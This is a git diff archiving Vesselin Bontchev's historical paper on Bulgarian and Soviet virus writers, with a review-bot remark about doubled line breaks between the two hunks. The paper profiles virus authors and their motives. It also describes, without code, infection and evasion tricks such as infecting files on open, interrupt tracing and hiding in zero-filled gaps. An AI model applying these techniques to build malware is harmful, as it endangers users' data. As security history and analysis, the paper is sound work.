While computerization in itself is not a bad thing, we made a very severe mistake. The Bulgarian economy was very weak (now it is even weaker), but we had quite a lot of skilled people. Therefore, we should not have tried to produce hardware while we had good chances in the software industry, where mainly "brainware" is required. However, Bulgaria did just the opposite. Instead of buying hardware, we began to produce it (mainly illegal Apple and IBM clones). Instead of producing our own software and trying to sell it in the West, we began to steal Western computer programs, to change some copyright notices in them, and to re-sell them (mainly in Bulgaria, in the Soviet Union, and in the other countries of the former Eastern bloc).

At that time most Western software was copy protected. Instead of training our skilled people to write their own programs, we began to train them to break copy protection schemes.
And they achieved great success in this field. The Bulgarian hackers are perhaps the best at cracking copy-protected programs. Besides, they had no real hope of making and selling their own programs, since, due to the total lack of copyright law on computer software, it was impossible to sell more than two or three copies of a computer program in Bulgaria. The rest were copied.

Since the introduction of computers into Bulgarian offices was not a natural process but the result of an administrative order, very often these computers were not used; they were only considered objects of prestige. Very often, on the desk of a company director, near the phone, stood a personal computer. The director himself almost never used the computer; however, sometimes his/her children came to the office to use it, to play games or to investigate its internals. While the price of personal computers in Bulgaria was too high to permit a private person to own one, it was common practice to use the computer at the office for personal purposes. At the same time, computer education was very widely introduced in Bulgaria. Everyone was educated in this field, from children in the kindergartens to old teachers who had just a few years until retirement. Since this kind of science is better comprehended by younger brains, it is no wonder that the people who became most skilled in this field were very young. Very young, and not yet morally mature. We spent a lot of effort teaching these people how to program, but forgot to educate them in computer ethics. Besides, a lack of respect for the work of others is a common problem in socialist societies.

4.1.2)

The second main reason is the widespread practice of software piracy (which was, in fact, a kind of state policy) and the very low pay of the average programmer.
As was mentioned above, Bulgaria took the wrong decision in producing computers and stealing programs. There is still no copyright law concerning computer software there. Because of this, software piracy was an extremely widespread practice. In fact, almost all software products in use were illegal copies. Most people using them have never seen the original diskettes or original documentation. Very often there was no documentation at all.

Since all kinds of programs (from games to desktop publishing systems) were copied very often, this greatly helped the spread of computer viruses.

At the same time, the work of the average programmer was valued very little; there was almost no chance of selling his/her software products. Even now, a programmer in Bulgaria is paid 100 to 120 times less than a programmer with the same qualifications in the USA.

This caused several young people to become embittered against a society that was unable to value them as it should. It is only one step from this to turning these young people into creators of destructive viruses. Some of them (e.g., the Dark Avenger) took this step.

4.1.3)

The third major reason is the total lack of legislation against the creation and wilful distribution of computer viruses, and against illegal access to and modification of computer information in general.

Because of the lack of copyright laws on computer software, there is no such thing as ownership of computer information in Bulgaria. Therefore, the modification or even the destruction of computer information is not considered a crime, since no one's property is damaged.

The Bulgarian legislation is hopelessly old in this area. Furthermore, even if an appropriate law is passed in the future, as a penal law it will not be applicable to acts committed before it was passed.
Therefore, the virus writers still have nothing to fear.

That is why the creation of new computer viruses has become some kind of sport or entertainment in Bulgaria.

4.1.4)

The next reason is the very weak organization of the fight against computer viruses in Bulgaria. Just now our country is in a very deep economic crisis. We lack funds for everything, including such basic goods as food and gasoline. At the same time, organizing the fight against viruses would require money: for the establishment of a network of virus test centers that collect and investigate computer viruses, centers equipped with the best hardware, centers able to communicate among themselves and with similar centers in the world in an effective way. Such an effective way is the electronic mail system, and Bulgaria is still taking its first steps in global computer communications. All this requires a lot of money, money that our government just does not have now.

4.1.5)

Another reason is the mistaken view that society holds of the computer virus problem.

Still, the victims of a computer virus attack consider themselves victims of a bad joke, not victims of a crime.

4.1.6)

The least important reason, in my opinion, is the availability of and easy access to information of a particular kind.

All kinds of tricks for fooling the operating system circulate among the Bulgarian hackers. Some of them are often published in computer-related magazines. As was mentioned above, there is even a specialized BBS dedicated to virus spreading, and a special (local to Bulgaria) FidoNet echo dedicated to virus writing. Not to mention the well-known file INTERxyy (Ralf Brown's interrupt list), published by Ralf Brown from the USA as shareware. It is very popular in Bulgaria, since it contains, carefully described, a huge number of undocumented tricks.
+ + + +However, this is not a very important reason. Usually those, who have + +decided to make a virus already know how to do it, or, at least, can + +figure it out by themselves. They do not need to take an existing + +virus and to modify it. The proof is the prevalence of original + +Bulgarian viruses over the variants of known ones, as well as the + +fact, that many new ideas for virus writing were first invented and + +implemented in Bulgaria. + + + +4.2) General reasons. + +--------------------- + + + +Since viruses are also created in all the other parts of the world, + +there should be also some general reasons for this. These reasons + +are, of course, valid for Bulgaria too. Let's see these general + +reasons. + + + +4.2.1) Wish for glory. + + + +Every programmer dreams that his/her program gets widely spread and + +used. A lot of very good programmers write and distribute wonderful + +software packages for free --- with the only intention to have more + +users using their package. However, for a program to be used, it has + +to be good enough. And not every programmer is able to make a program + +so good that the users will widely use it --- even for free. At the + +same time, computer viruses do spread very widely, regardless and + +even against the users' will. So, when a virus writer reads in a + +newspaper that his virus has been discovered at the other end of the + +world, he feels some kind of perverted pleasure. Some people write + +viruses just to see their names (or the names of their viruses) + +published in the newspapers. This reason has yet another aspect. In + +the beginning of the virus era, when the idea of the computer virus + +was very new, only the very good programmers were able to make a + +virus. It became a common myth that if you can write a virus, you're + +a great programmer. This myth might have been justified at the + +beginning, but now it is completely without sense. 
Nevertheless, + +young hackers began to write viruses --- just to prove to their + +friends and to the rest of the world how good programmers they are. + +Some of them were really unable to invent something original --- + +that's why they just picked a known virus, modified it a bit and + +released this new mutation. This explains why there are so many + +variants of the simplest viruses that were first created --- BRAIN, + +JERUSALEM, STONED, VIENNA, CASCADE... A typical example is the + +Italian virus writer, who calls himself Cracker Jack. + + + +4.2.2) Simple human curiosity. + + + +One has to admit that the idea of a computer program that is able to + +spread by its own means, to replicate, to hide from the user (who is + +believed to maintain the computer under full control), and in general + +to behave as a real live being is really fascinating. Just simple + +human curiosity is sufficient to make some people, if they are young + +and irresponsible enough, to try to make a computer virus. Some of + +them do succeed. A greater and greater part, if we consider the + +amount of last reports for new viruses. Some of them claim that they + +are writing viruses "only for themselves," "only for fun," and that + +"they do not spread them." However, it is often impossible to fully + +control the spread of a "successful" computer virus. The more clever + +these viruses are, the greater the probability that they will + +"escape." There is an idea to teach students how viruses are made --- + +of course in a very strongly restricted environment. Maybe at least + +for some this will fulfil their curiosity and they will not be + +tempted to write their own virus. Maybe if we force every computer + +science student to learn Dr. 
Fred Cohen's theorems on the + +computational aspects of computer viruses, if we administer an exam + +and ask students to design a virus protection scheme or to help a + +cluster of users, attacked by a computer virus for a course work --- + +well, maybe in this case these students will have more than enough of + +the computer virus problem and will not want to hear about it any + +more --- least to make their own viruses. 4.2.3) Easy access to + +information. + + + +Sufficient information, needed to write a virus can be found easily. + +This information is often even more accessible than in Bulgaria. + + + +The person that wants to write an average virus needs only to dig in + +the respective manuals --- manuals, which are often not available in + +Bulgaria. However, the usefulness of the easy access to this + +information is much greater than the damage, caused by the fact that + +it is used by the virus writers. + + + +4.2.4) Military interests. + + + +It is often rumoured that the superpowers are working on the problem + +how to use computer viruses to destroy the enemy computers' software. + +It is even very probable, that in several countries such research is + +performed. There are reports on this from the USA, France and the + +USSR. + + + +This is no wonder --- it is the right of every military force to + +investigate any new idea and to consider the possible usefulness + +and/or threats it might bring to the national defense. However, it is + +quite improbable that the computer viruses can be used for this + +purpose. Just like the live viruses, the computer ones are able to + +spread only among individuals with very similar immunotype, i.e. --- + +among compatible computers. The most widely used kinds of personal + +computers are the IBM PC, Macintosh, Amiga and Atari ST. It is + +therefore no wonder that the vast majority of existing computer + +viruses are able to infect only these computers. 
In the same time, + +viruses that infect one kind of computer (say, IBM PC), are unable to + +spread (or even to run) on another (e.g., a Macintosh). They are + +usually not able to run even on two different operating systems in + +one and the same computer. Even a different version of the same + +operating system might cause big problems to a particular computer + +virus --- up to preventing it to work. The common personal computers + +are never assigned important tasks in the army. Therefore, even if a + +virus infects them, and even if it destroys all the data on all such + +computers, the caused damage will not be of great importance. + +Computers that are used for the really important things, such as + +rocket leading or cannon aiming, are always specialized ones. Their + +programs are usually hard--coded and only data can be entered in + +them. It is not possible to insert an infected IBM PC diskette in the + +computers that control the NORAD system. At the same time, the + +computers that control different important devices are usually + +incompatible even between themselves. Therefore, even if someone + +writes a virus for a specialized rocket computer, this virus will not + +be able to infect the computers of a strategic bomber or even these + +of a rocket of a different system. So, such virus will not spread + +very much. And last, but not least, such virus has to be placed + +somehow in the enemy's computers. Since, as we saw above, it won't be + +able to spread from one computer to another of a different kind, + +obviously someone has to insert it in the victim computer. But if you + +have access to the enemy's computers, you don't need a virus. You can + +do the same task easier (and often much better) "manually", or with a + +Trojan horse or a logic bomb. 4..2.5) Corporate interests. + + + +It is also often speculated that the large software companies and the + +producers of anti--virus software make or willfully spread computer + +viruses. 
+ + + +There is some reason behind this. Indeed the fear of viruses can make + +the user buy only original software (sometimes --- quite expensive), + +and not to use pirated copies, shareware or freeware. At the same + +time, companies that produce anti--virus software are interested that + +their products are sold. And they will be, if the user needs + +anti--virus protection. However, it is rather improbable, that a + +software company (whether producing or not anti--virus software) will + +take the risk to become known that it willfully spreads viruses. It + +will be probably boycotted by its users and the losses of income will + +be much greater than any gains. As to the producers of anti--virus + +software, they don't need to write viruses themselves, in order to + +sell their programs. It is sufficient to use the hype that the media + +accords to the problem, to mention how many viruses there are and how + +many of them their wonderful product is able to defeat. + + + +5) The Soviet virus factory and virus writing in the other countries + +===================================================================== + + of the former Eastern block. + + ============================ + + + +While Bulgaria was one of the best computerized countries in East + +Europe, the political, economical, and social conditions in the other + +countries were (and maybe still are) quite similar. That is why the + +virus writing and spreading has been developed in these countries + +too. + + + +Viruses are created in Poland ( W13, 217, 583, FATHER CHRISTMAS, DOT + +EATER, JOKER, VCOMM, AKUKU, 311, HYBRYD), in Hungary ( STONE `90, + +FILLER, MONXLA, POLIMER, TURBO KUKAC), in Czechoslovakia (the + +AANTIVIRUS virus), and even in Yugoslavia ( 17Y4, SVIR). According to + +some reports from Romania, there are no viruses written there, but + +the W13, YANKEE DOODLE, DARK AVENGER and StONED viruses are quite + +widespread. 
+ + + +However, the country most similar to Bulgaria is, undoubtedly, the + +Soviet Union. According to the Soviet anti--virus researcher Bezrukov + +[Bezrukov], the first virus appeared there almost at the same time as + +in Bulgaria and, by the way, it was the same virus ( VIENNA). So, the + +preconditions are almost the same as with our country. + + + +There are, however, two main differences: the level of + +computerization and the number of virus writers. + + + +The level of computerization is still much lower than in Bulgaria. + +There are much fewer computers per person than in our country. The + +users are much more isolated, due to the much larger distances. The + +telephone network is in the same miserable condition, as in Bulgaria. + +The networks are very few and not widely used. For instance, in Sofia + +alone there are more FidoNet nodes than in the whole Soviet Union. It + +is not safe to send floppy disks by regular mail, since they will be + +probably stolen. All this delays very much the spreading of viruses. + +Unfortunately, it also delays the distribution of anti--virus + +products and the information exchange between the anti--virus + +researchers. For instance, examples of new viruses created there + +reach the Western anti--virus researchers with huge delays. + +Unfortunately, the other factor is much more dangerous. In the USSR + +there are much more programmers than in Bulgaria and they seem at + +least as much motivated in creating new viruses. The virus writing in + +the Soviet Union is currently in the same state as it was in Bulgaria + +about three years ago. However, at that time only nine variants of + +known viruses and one stupid original virus has been created there (6 + +VIENNA variants, 3 AMSTRAD variants, and the OLD YANKEE virus). At + +the first Soviet anti--virus conference in Kiev (mid--November, 1990) + +more than 35 different viruses of Russian origin were reported. 
+ + + +Some of them were variants of known viruses, while others were + +completely new. It has been noticed that the Soviet virus writers are + +less qualified than the Bulgarian ones, but they use a destructive + +payload in their creations much more often. + + + +Since the reasons of virus writing in the USSR are very similar to + +those in Bulgaria; since this virus writing occurs in a much larger + +scale; and since no steps are taken by the authorities in order to + +stop it, it is possible to predict that in the next few years the + +Soviet Union will be far ahead of Bulgaria in computer virus creation + +and that a new, much larger wave of computer viruses will come from + +there. Probably after a year, several (up to ten) virus writers with + +the qualification of the Dark Avenger will emerge from there. + + + +6) The impact of the Bulgarian viruses on the West and on the national + +====================================================================== + + software industry. + + ================== + + + +While a huge part of the existing viruses are + +produced in Bulgaria, a relatively very small part of them spread + +successfully to the West. Of more than 160 Bulgarian viruses, only + +very few ( DARK AVENGER, V2000, V2100, PHOENIX, DIAMOND, + +NOMENKLATURA, VACSINA, YANKEE DOODLE) are relatively widespread. At + +the same time some of them ( DARK AVENGER, V2000, YANKEE DOODLE, + +VACSINA) are extremely widespread. According to John McAfee, about 10 + +% of all infections in the USA are caused by Bulgarian viruses --- + +usually by the DARK AVENGER virus. In West Europe this virus shares + +the popularity with YANKEE DOODLE and VACSINA. + + + +Of the viruses listed above, the major part are written by the Dark + +Avenger --- all except YANKEE DOODLE and VACSINA. Almost all his + +viruses (in this case --- with the exception of DIAMOND, which is the + +least spread) are extremely destructive. 
The PHOENIX and NOMENKLATURA + +viruses corrupt the FAT in such a subtle way, that when the user + +notices the damage, there is no way to disinfect the infected files + +and even to determine which files are damaged. The only way is to + +reformat the hard disk. + + + +It is difficult to estimate the costs of all damage caused by + +Bulgarian viruses. There are reports from Germany about a 10,000,000 + +DM damage, caused only by the VACSINA virus. It is probable, however, + +that these numbers are largely overestimated. + + + +The huge number of known Bulgarian viruses causes also indirect + +damage to the West community, even if the viruses themselves do not + +escape from Bulgaria, but only examples of them are supplied to the + +anti--virus researchers. These researchers have to develop + +anti--virus programs against these viruses (just in case the latter + +succeed to spread outside Bulgaria). Therefore, they have to waste + +their time and efforts. Furthermore, the user is forced to buy new + +anti--virus programs (or pay for updates of the old ones), in order + +to feel safe against these viruses. In the same time, the creation + +and spreading of Bulgarian viruses causes a lot of damage to the + +Bulgarian economics. In Bulgaria, the Bulgarian viruses are much more + +widespread. More than 80 % of about 160 known Bulgarian viruses have + +been detected in the wild in our country. It is difficult, however, + +to evaluate, or even to estimate the exact costs of the caused + +damage, since in Bulgaria the term "property of computer information" + +simply does not exist in legal sense. It is the same with the cost of + +this information. In fact, the creation of computer viruses causes + +also indirect damage to our economics. First of all, a lot of + +extremely capable people are wasting their minds to create + +destructive viruses, instead of something useful. 
Second, the fact + +that the Bulgarian programmers use their time to create computer + +viruses destroys their reputation as a whole. No serious software + +company accepts to deal with Bulgarian programmers or software + +companies, because it is afraid that the supplied software might be + +pirated or might contain a virus. 7) Conclusion. Virus writing in + +Bulgaria is an extremely widespread hobby. Most of the major virus + +writers are known, but no measures can be taken against them. Their + +work causes a lot of damage to the Western community, as well as to + +the national economics. Therefore, it is urgent to take legal + +measures in this direction; measures that will make virus writing and + +willful spread of computer viruses a criminal act. This is the only + +way to stop, or at least to reduce the threat. + + + +References + +========== + + + +[KV88] Viruses in Memory, Komputar za vas, 4--5, 1988, pp.12--13 (in + +Bulgarian) + + + +[KV89] The Truth about Computer Viruses, Vesselin Bontchev, Komputar + +za vas, 1--2, 1989, pp. 5--6 (in Bulgarian) + + + +[Chip] Die neue Gefahr --- Computerviren, Steffen Wernery, Chip, 9, + +1987, pp. 34--37 (in German) + + + +[Bezrukov] Computer Virology, Nikolay Nikolaevitch Bezrukov, Kiev, + +1991, ISBN 5-88500-931-X (in Russian) + + + + + +Downloaded From P-80 International Information Systems 304-744-2253 + diff --git a/textfiles.com/virus/bulgfactdoc.vir b/textfiles.com/virus/bulgfactdoc.vir new file mode 100644 index 00000000..683280a0 --- /dev/null +++ b/textfiles.com/virus/bulgfactdoc.vir 
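Review bot: the text in this hunk is double-spaced throughout (every content line is followed by an empty `+` line, e.g. `+As was mentioned above, Bulgaria took the wrong decision in producing` / `+ ` / `+computers and stealing programs.`), which is the usual symptom of a CR LF file whose carriage returns were each counted as a second line break on import; the next file in this commit, `bulgfactdoc.vir`, carries the same paper without the doubling. Compare against the original bytes and, if the doubling was introduced on import, re-add the file from source and pin these archive files with a `.gitattributes` rule such as `*.txt -text` / `*.vir -text` so Git does not normalise their line endings again. The trailing BBS tagline (`Downloaded From P-80 International Information Systems 304-744-2253`) is not part of the paper but is part of the archived file; keeping it verbatim is right for a mirror, just note it in the commit message so nobody "cleans" it later.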
@@ -0,0 +1,1106 @@ + + The Bulgarian and Soviet Virus Factories + ======================================== + + Vesselin Bontchev, Director + Laboratory of Computer Virology + Bulgarian Academy of Sciences, Sofia, Bulgaria + + +0) Abstract +=========== + +It is now well known that Bulgaria is leader in computer virus +production and the USSR is following closely. This paper tries to +answer the main questions: Who makes viruses there, What viruses are +made, and Why this is done. It also underlines the impact of this +process on the West, as well as on the national software industry. + +1) How the story began +====================== + +Just three years ago there were no computer viruses in Bulgaria. +After all, these were things that can happen only in the capitalist +countries. They were first mentioned in the April issue of the +Bulgarian computer magazine "Komputar za vas" ("Computer for you") +[KV88] in a paper, translated from the German magazine "Chip" [Chip]. +Soon after that, the same Bulgarian magazine published an article +[KV89]], explaining why computer viruses cannot be dangerous. The +arguments presented were, in general, correct, but the author had +completely missed the fact that the majority of PC users are not +experienced programmers. + +A few months later, in the fall of the same year, two men came in the +editor's office of the magazine and claimed that they have found a +computer virus. Careful examination showed that it was the VIENNA +virus. + +At that time the computer virus was a completely new idea for us. To +make a computer program, whose performance resembles a live being, is +able to replicate and to move from computer to computer even against +the will of the user, seemed extremely exciting. + +The fact that "it can be done" and that even "it had been done" +spread in our country like wildfire. Soon hackers obtained a copy of +the virus and began to hack it. 
It was noticed that the program +contains no "black magic" and that it was even quite sloppily +written. Soon new, home--made and improved versions appeared. Some of +them were produced just by assembling the disassembly of the virus +using a better optimizing assembler. Some were optimized by hand. As +a result, now there are several versions of this virus, that were +created in Bulgaria --- versions with infective lengths of 627, 623, +622, 435, 367, 353 and even 348 bytes. The virus has been made almost +two times shorter (its original infective length is 648 bytes) +without any loss of functionality. + +This virus was the first case. Soon after that, we were "visited" by +the CASCADE and the PING PONG viruses. The later was the first +boot--sector virus and proved that this special area, present on +every diskette can be used as a virus carrier, too. All these three +viruses were probably imported with illegal copies of pirated +programs. + +2) Who, What & Why. +=================== + +2.1) The first Bulgarian virus. +------------------------------- + +At that time both known viruses that infected files ( VIENNA and +CASCADE) infected only COM files. This made me believe that the +infection of EXE files was much more difficult. Unfortunately, I made +the mistake by telling my opinion to a friend of mine. Let's call him +"V.B." for privacy reasons.(1) +................................................................... +[(1) These are the initials of his true name. It +will be the same with the other virus writers that I shall mention. +Please note, that while I have the same initials (and even his full +name resembles mine), we are two different persons.] +................................................................... +The challenge was taken immediately and soon after that I received a +simple virus that was able to infect only EXE files. It is now known +to the world under the name of OLD YANKEE. 
The reason for this is +that when the virus infects a new file, it plays the "Yankee Doodle" +melody. + +The virus itself was quite trivial. Its only feature was its ability +to infect EXE files. The author of this virus even distributed its +source code (or, more exactly, the source code of the program that +releases it). Nevertheless, the virus did not spread very widely and +even had not been modified a lot. Only a few sites reported to be +infected by it. Probably the reason for this was the fact, that the +virus was non--resident and that it infected files only on the +current drive. So the only possibility to get infected by it was to +copy an infected file from one computer to another. + +When the puzzle of creating a virus which is able to infect EXE files +was solved, V.B. lost his interest in this field and didn't write any +other viruses. As far as I know, he currently works in real--time +signal processing. + +2.2) The T.P. case. +------------------- + +The second Bulgarian virus--writer, T.P., caused much more trouble. +When he first heard the idea about aself--replicating program, he was + very interested, decided to writehis own virus, and he succeeded. +Then he tried to implement a virus protection scheme and succeeded +again. The next move was to improve his virus to bypass his own virus +protection, then to improve the virus protection and so on. That is +why there are currently about 50 different versions of his viruses. + +Unfortunately, several of them (about a dozen) were quite +"successful." They spread world--wide. There are reports about them +from all countries of the former Eastern block, as well as from the +USA and West Europe. + +Earlier versions of these TP viruses are known under the name +VACSINA, because they contain such a string. In fact, this is the +name of the virus author's virus protection program. It is +implemented as a device driver with this name. 
The virus merely tries +to open a file with this name, which means "Hey, it's me, let me +pass." + +The latest versions of the virus are best known under the name YANKEE +DOODLE, because they play this tune. The conditions on which the tune +is played are different with the different versions of the virus --- +for instance when the user tries to reboot the system, or when the +system timer reaches 5 p.m. + +All TP viruses are strictly non--destructive. Their author payed +particular attention not to destroy any data. For instance, the virus +does not infect EXE files for which the true file length and the +length of the loadable part as it is present in the EXE header, are +not equal. As far as I know, no other virus that is able to infect +EXE files works this way. + +Also, the virus does not try to bypass the resident programs that +have intercepted INT 13h, therefore it takes the risk to be detected +by most virus activities monitoring software. The author of the virus +obviously could circumvent it --- for instance it uses a clever +technique, now known as "interrupt tracing" to bypass all programs +that have hooked INT 21h. The only reason for not bypassing INT 13h +as well, is that this would also bypass all disk casheing programs, +thus it could cause damage. + +Of course, the fact that the virus is not intentionally destructive +does not mean that it does not cause any damage. There are several +reports of incompatibilities with other software; or of panicking +users, that have formatted their disks; or, at least, damage caused +by time loss, denial of computer services, or expenses removing the +virus. It is well known, that "there ain't no such thing as a good +virus." + +The TP viruses were not spread intentionally; the cause could be +called "criminal negligence." The computer used by T.P. to develope +his viruses was also shared by several other people. 
This is common +practice in Bulgaria, where not everyone can have a really "personal" +computer to work with. T.P. warned the other users that he is writing +viruses, but at this time computer viruses were a completely new +idea, so nobody took the warning seriously. Since T.P. didn't bother +to clean up after himself, these users got, of course, infected. +Unintentionally, they spread the infection further. + +When asked about the reason of writing viruses, T.P. replied that he +did this in order to try several new ideas; to better learn the +operating system and several programming tricks. He is not interested +in this field any more --- he has stopped writing viruses about two +years ago. + +2.3) The Dark Avenger. +---------------------- + +In the spring of 1989 a new virus appeared in Bulgaria. It was +obviously "home--made" and just to remove any doubts about it, there +was a string in it, saying "This program was written in the city of +Sofia (C) 1988-89 Dark Avenger." + +The virus was incredibly infectious --- when it was in memory, it was +sufficient to copy or just to open a file to get it infected. When +the user felt that there is a virus in his/her system and, without +booting from a non--infected write--protected system diskette, ran an +anti--virus program which wasn't aware of this new virus, he usually +got all his/her executable files infected. + +The idea of infecting a file when it is opened was new and really +"successful." Now such viruses are called "fast infectors." This +strategy helped the virus to spread world-- wide. There are reports +from all European countries, from the USA, the USSR, even from +Thailand and Mongolia. + +On the top of this, the virus was very dangerously destructive. On +each 16th run of an infected program, it overwrote a sector on a +random place of the disk, thus possibly destroying the file or +directory that contained this sector. 
The contents of the overwritten +sector was the first 512 bytes of the virus body, so even after the +system has been cleaned up, there were files, containing a string +"Eddie lives...somewhere in time!" This was causing much more damage +than if the virus was just formatting the hard disk, since the +destruction was very unnoticable and when the user eventually +discovered it, his backups probably already contained corrupted data. + +Soon after that, other clever viruses began to appear. Almost all of +them were very destructive. Several contained completely new ideas. +Now this person (we still cannot identify him exactly) is believed to +be the author of the following viruses: + +DARK AVENGER, V2000 (two variants), V2100 (two variants), 651, +DIAMOND (two variants), NOMENKLATURA, 512 (six variants), 800, 1226, +PROUD, EVIL, PHOENIX, ANTHRAX, LEECH... + + +Dark Avenger has several times attacked some anti--virus researchers +personally. The V2000/V2100 viruses claim to be written by "Vesselin +Bontchev" and in fact hang the computer when any program, containing +this string is run. A slightly modified variant of V2100 (V2100-B) +has been used to trojanize version 66 of John McAfee's package +VIRUSCAN. + +There are reports that Dark Avenger has called several bulletin board +systems in Europe and has uploaded there viruses. The reports come +from the UK, Sweden, the Netherlands, Greece... Sometimes the viruses +uploaded there are unknown in Bulgaria (NOMENKLATURA,ANTHRAX). But +they are obviously made in our country --- they contain messages in +Cyrillic. Sometimes Dark Avenger uploads a Trojan program that +spreads the virus --- not just an infected program. This makes the +detection of the source of infection more difficult. + +One particular case is when he has uploaded a file called UScan, +which, when run, claims to be the "universal virus scanner," written +by Vesselin Bontchev. 
Even the person who has uploaded it, has logged +under the name "Vesselin Bontchev." In fact, the program just +infected all scanned files with the ANTHRAX virus. + +While the other Bulgarian virus writers seem to be just irresponsible +or with childish mentality, the Dark Avenger can be classified as a +"technopath." He is a regular user of several Bulgarian bulletin +board systems, so one can easily exchange e-mail messages with him. +When asked why his viruses are destructive, he replied that +"destroying data is a pleasure" and that he "just loves to destroy +other people's work." + +Unfortunately, no measures can be taken against him in Bulgaria. +Since there is no law for information protection, his activities are +not illegal there. He can be easily caught by tapping the phones of +the BBSes that he uses, but the law enforcement authorities cannot +take such measures, since there is no evidence of illegal activities. +Alas, he knows this perfectly. + +2.4) Lubo & Ian. +---------------- + +Some of the Dark Avenger's viruses proved to be very "successful" and +caused real epidemics. That is why they were often imitated by other +virus writers, that had no imagination to design their own virus, but +were jealous of Dark Avenger's fame. So they just disassembled his +viruses (usually the first one) and used parts of it --- sometimes +without even understanding their purpose. Such is the case with the +MURPHY viruses. + +According to a string in them, they are written by "Lubo & Ian, USM +Laboratory, Sofia." These people do exist and they have used their +real names. "Lubo" has even been several times interviewed by +newspaper's reporters. + +They claim that the virus was written for vengeance. They have done +some important work for their boss and the latter refused to pay +them. That is why they developed te virus in one night and released +it. The fact that the virus will spread outside the laboratory just +didn't come to their minds. 
However, this does not explain the +developing of the other versions of the same virus (there are at +least four variants). Nevertheless, it proves one more time that it +is better (and safer, too) to pay the good programmers well... + +Besides MURPHY, these two virus writers have created another virus, +called SENTINEL (5 variants). The only unusual thing with this virus +is that it is written in a high--level programming language (Turbo +PASCAL), but is not an overwriting or a companion virus as most HLL +viruses are. It is able to infect COM and EXE files by appending +itself to them and by preserving their full functionality. It is also +memory resident, hides the file length increase when the user issues +the DIR command, and even mutates. + +2.5) The virus writer from Plovdiv. +----------------------------------- + +This man, P.D., claimed that he has written viruses "for fun" and +only "for himself" and that he "never releases them." Unfortunately, +at least two of them have "escaped" by accident. These are the ANTI- +PASCAL605 and the TERROR viruses. Especially the latter is extremely +virulent and caused a large epidemic in Bulgaria. + +P.D. was very sorry for that and submitted examples of all his +viruses to the anti--virus researchers so that the respective +anti--virus programs be developed --- just in case some of these +viruses escapes too. These viruses turned out to be quite a few, +ranging from extremely stupid to very sophisticated. Here are some of +them: + +XBOOT, ANTIPASCAL (5 variants), TINY (11 variants), MINIMAL-45, +TERROR, DARK LORD, NINA, GERGANA, HAPPY NEW YEAR (2 variants), INT +13. + +P.D. claims that the DARK LORD virus (a minor TERROR variant) is not +written by him. The TINY family has nothing to do with the Danish +TINY virus (the 163--byte variant of the KENNEDY virus), and, as well +as the MINIMAL-45 virus, are written with the only purpose to make +the shortest virus in the world. + +Now P.D. 
is not writing viruses any more --- because "it is so easy, +that it is not interesting," according to his own words. He is +currently writing anti--virus programs --- and rather good ones. + +2.6) The two guys from Varna. +----------------------------- + +They are two pupils (V.P. and S.K.) from the Mathematical High School +in Varna (a town on the Black Sea). They have developed several +viruses and continue to do so, producing more and more sophisticated +ones. Furthermore, they intentionally spread their viruses, usually +releasing them on the school's computers or in the Technical +University in Varna. When asked why they write and release viruses, +they reply "because it's so interesting!" + +The viruses written by them are: MG (5 variants), SHAKE (5 variants), +DIR and DIR II. All of them are memory resident and infect files when +the DIR command is performed. + +The last one is an extremely virulent and sophisticated virus --- as +sophisticated, as THE NUMBER OF THE BEAST. It is also a completely +new type of virus --- it infects nether boot sectors, nor files. +Instead, it infects the file system as a whole, changing the +information in the directory entries, so that each file seems to +begin with the virus. + +There is a counter of the number of infected systems in the virus +body. There is evidence that V.P. and S.K. collect infected files, +copy the contents of the counter and then draw curves of the spread +of infection, checking the normal distribution law. They are doing +this "for fun." + +2.7) W.T.'s case. +----------------- + +W.T. is a virus writer from Sofia, who has written two viruses --- +WWT (2 variants) and DARTH VADER (4 variants). According to his own +words, he has done so to test a new idea and to gain access to the +Virus eXchange BBS (see below). + +The new idea consisted of a virus (DARTH VADER) that does not +increase file lengths, because it searches for unused holes, filled +with zeros, and writes itself there. 
Also, the virus does not perform +any write operations. Instead, it just waits for a COM file to be +written to by DOS and modifies the file's image in memory just before +the write operation is performed. + +W.T. does not write viruses any more, but he is still extremely +interested in this field. He is collecting sophisticated viruses and +disassembles them, looking for clever ideas. + +2.8) The Naughty Hacker. +------------------------ + +This virus writer, M.H., is a pupil and also lives in Sofia. He has +written several viruses, most of which contain the string "Naughty +Hacker" in their body. All of them are non-- destructive, but contain +different video effects --- from display desynchronization to a +bouncing ball. + +Currently, at least 8 different variants are isolated, but it is +believed that even more exist and are spread in the wild. Also, it is +believed that M.H. continues to produce viruses. As usual, he is +doing so "because it is interesting" and "for fun." + +He is also the author of three simple boot sector viruses (BOOTHORSE +and two others that are still unnamed). + +2.9) Other known virus writers. +------------------------------- + +The persons listed above are the major Bulgarian virus producers. +However, they are not alone. Several other people in Bulgaria have +written at least one virus (sometimes more). In fact, making a virus +is currently considered there a kind of sport, or a practical joke, +or means of self--establishment. + +Some of these virus writers have supplied their creations directly to +the anti--virus researchers, as if they are waiting for a reward. +This happens quite often --- probably they expect that the +anti--virus researcher, as the best qualified person, will evaluate +their creation better. Sometimes the fact that their virus becomes +known, is described, and is included in the best anti--virus programs +is sufficient for these people and they don't bother to really spread +their virus in the wild. 
So, probably the main reason for these +people to produce viruses is the seek of glory, fame, and +self--establishment. + +Such known Bulgarian virus writers (with the respective names of +their viruses given in parentheses) are V.D. from Pleven (MICRO-128), +A.S. and R.D. from Mihajlovgrad (V123), I.D. from Trojan (MUTANT, +V127, V270x), K.D. from Tutrakan (BOYS, WARRIER, WARRIOR, DREAM), and +others. + +2.10) Unknown Bulgarian virus writers. +-------------------------------------- + +Of course, there are also other virus writers, that are not known to +the author of this paper. Sometimes it is possible to determine the +town where the viruses were developed --- usually due to an +appropriate string in the virus body, or because the virus wasn't +found elsewhere. Some of the viruses are very simple, others are +quite sophisticated. Here are examples of such viruses. + + +- The KAMIKAZE virus has been detected only in the Institute of + Mathematics at the Bulgarian Academy of Sciences, Sofia and is + probably made there; + +- The RAT virus, made in Sofia, as it is written in its body; + +- The VFSI (HAPPY DAY) virus has been developed in the Higher + Institute of Finances and Economics in Svishtov (a small town on the + Danube) by an unknown programmer; + +- The DESTRUCTOR virus, probably made in Plovdiv, where it has been + first detected; + +- The PARITY virus, probably written in the Technical University, + Sofia, since it has not been detected elsewhere; + +- The TONY file and boot sector viruses, probably created in Plovdiv + where they have been first detected; + +- The ETC virus, detected only in Sofia; + +- The 1963 virus, a quite sophisticated one, probably made in the + Sofia University; + +- The JUSTICE virus. + +2.11) The Virus eXchange BBS. +----------------------------- + +About a year ago, the virus writing in Bulgaria entered a new phase. +The virus writers began to organize themselves. 
